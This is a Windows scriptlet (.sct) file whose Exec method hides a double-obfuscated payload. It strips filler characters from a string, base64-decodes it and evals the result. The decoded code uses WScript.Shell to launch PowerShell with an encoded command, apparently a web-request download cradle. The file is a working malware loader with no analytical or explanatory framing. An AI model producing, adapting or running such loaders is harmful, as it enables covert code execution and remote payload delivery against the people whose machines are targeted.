<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
	function Exec()	{
	var encode_str = "(DQogI(CAgDQ(oNCiB(2YXIg(c2hlb(GwgPS(BuZXc(gQWN0(aXZlW(E9iam(VjdCg(iV1Nj(cmlwd(C5TaG(VsbCI(pOw0K(IHNoZ(WxsLl(J1big(icG93(ZXJza(GVsbC(5leGU(gLWUg(YVFCM(0FISU(FJQUF(0QUhV(QWNnQ(nBBQ0(FBYUF(CMEFI(UUFjQ(UJ6QU(RvQUx(3QXZB(SElBW(VFCM0(FDNEF(ad0Jw(QUhRQ(WFBQj(FBR0l(BZFFC(ekFHV(UFjZ0(JqQUc(4QWJn(QjBBR(1VBYm(dCMEF(DNEFZ(d0J2Q(UcwQU(x3QkR(BSEFB(Y0FCc(EFITU(FZZ0J(sQUdF(QWRRQ(jBBR2(tBWmd(CMUFH(d0FPU(UEwQU(RJQU5(BQXhB(QzhBZ(EFCM0(FESUF(Nd0F4(QUM4Q(WNnQm(xBR1l(BY3dB(dkFHZ(0FaUU(JoQUd(RQWN3(QXZBR(zBBWV(FCcEF(HNEFM(d0J0Q(UhNQW(RnQmp(BSEFB(TVFBM(EFEQU(FMZ0J(rQUd3(QWJBQ(WdBQz(BBYnd(CMUFI(UUFaZ(0JwQU(d3QVp(RQWdB(RU1BT(2dCY0(FGVUF(jd0Js(QUhJQ(WN3Qm(NBRUV(BUkFC(TkFFa(0FUZ0(JKQUg(0QU1R(QmNBR(UVBY0(FCd0F(FUUFZ(UUIwQ(UdFQV(hBQk1(BRzhB(WXdCa(EFHd0(FYQUJ(VQUdV(QWJRQ(ndBQz(hBYlF(CekFI(WUFZd(0J3QU(RFQU5(BQXdB(QzRBW(kFCc0(FHd0F(Pd0Jw(QUhjQ(WNnQW(dBQzB(BZFFC(eUFHa(0FJQU(JvQUh(RQWRB(QndBS(E1BT2(dBdkF(DOEFj(Z0JoQ(UhjQU(xnQm5(BR2tB(ZEFCb(0FIVU(FZZ0I(xQUhN(QVpRQ(nlBR0(1BYnd(CdUFI(UUFaU(UJ1QU(hRQUx(nQmpB(RzhBY(lFBdk(FFTUF(jQUJ3(QUdrQ(WN3Qm(lBR1V(BWVFC(MUFIU(UFhUU(JtQUh(VQWJB(QTVBR(FFBTW(dBMEF(ERUFM(d0IwQ(UhjQU(1nQXp(BREVB(THdCe(UFHVU(FaZ0J(6QUM4(QWFBQ(mxBR0(VBWkF(CekFD(OEFiU(UJoQU(drQWJ(nQXZB(SEFBW(kFCbU(FDNEF(aUUI0(QUdVQ(UlBQX(RBRzh(BZFFC(MEFHW(UFhUU(JzQUd(VQUlB(QkRBR(G9BWE(FCVkF(ITUFa(UUJ5Q(UhNQV(hBQkJ(BRVFB(VFFCS(kFFNE(FTUUI(rQURF(QVhBQ(kJBSE(FBY0F(CRUFH(RUFkQ(UJoQU(Z3QVR(BQnZB(R01BW(VFCc0(FGd0F(WQUJs(QUcwQ(WNBQX(ZBSEF(BWkFC(bUFDN(EFaUU(I0QUd(VQU93(QnpBS(FFBWV(FCeUF(IUUFM(UUJ3Q(UhJQW(J3Qmp(BR1VB(Y3dCe(kFDQU(FRd0E(2QUZ3(QVZRQ(npBR1(VBY2d(CekFG(d0FRU(UJFQU(UwQVN(RQk9B(RWtBZ(mdBeE(FGd0F(RUUJ3(QUhBQ(VJBQm(hBSFF(BWVFC(Y0FFd(0Fid0(JqQUd(FQWJB(QmNBR(lFBWl(FCdEF(IQUFM(d0J3Q(UdRQV(pnQXV(BR1VB(ZUFCb(EFBPT(0iKQ0(KDQog(ICAgD(QogIC(AgDQo(gDQoN(Cg))"
	var decode_str = encode_str.split("(").join("");
	var decode_str = decode_str.split(")").join("=");

	decodeBase64 = function(s) {
   	 var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;
    	var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    	for(i=0;i<64;i++){e[A.charAt(i)]=i;}
    	for(x=0;x<L;x++){
        	c=e[s.charAt(x)];b=(b<<6)+c;l+=6;
        	while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));}
   	 }
    	return r;
	};

	var decoded = decodeBase64(decode_str);
	eval(decoded)
}
]]>
</script>
</scriptlet>
